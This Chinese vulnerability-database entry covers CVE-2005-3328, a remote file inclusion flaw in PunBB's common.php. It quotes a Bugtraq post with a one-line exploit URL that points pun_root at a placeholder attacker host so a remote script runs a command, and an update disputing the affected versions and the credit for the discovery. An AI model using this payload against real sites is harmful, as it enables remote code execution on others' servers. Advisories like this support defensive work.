PunBB 'common.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1197510 漏洞类型 未知
发布时间 2005-10-27 更新时间 2005-11-02
CVE编号 CVE-2005-3328 CNNVD-ID CNNVD-200510-239
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2005100054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-239
|漏洞详情
PunBB是个快速、轻量的PHP架构网络论坛。PunBB1.1.2到1.1.5的common.php中存在PHP远程文件包含漏洞。远程攻击者可以借助pun_root参数执行任意代码。
|漏洞EXP
Remote File Inclusion in forum PunBB

Date:24/10/2005

Severity: High

version: 1.1.2 >> 1.1.5

The bug reside in common.php

Exploit :

http://www.host.com/forum/include/common.php?pun_root=http://www.host_ev
il.com/cmd?&=id

Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

--------------------------------------------------------------------------------------------
UPDATE : 

1. The bug is over a year old (see bid 10760).
2. The bug was fixed in 1.1.5, so that version is not vulnerable.
3. It was discovered by Radek Hulan, not "RoDheDoR".
4. The exploit detailed is copied directly from the old bid so "RoDheDoR" was obviously aware of it. 
|参考资料

来源:BID
名称:15175
链接:http://www.securityfocus.com/bid/15175
来源:SREASON
名称:107
链接:http://securityreason.com/securityalert/107
来源:BUGTRAQ
名称:20051024RemoteFileInclusioninforumPunBB
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113017630505223&w=2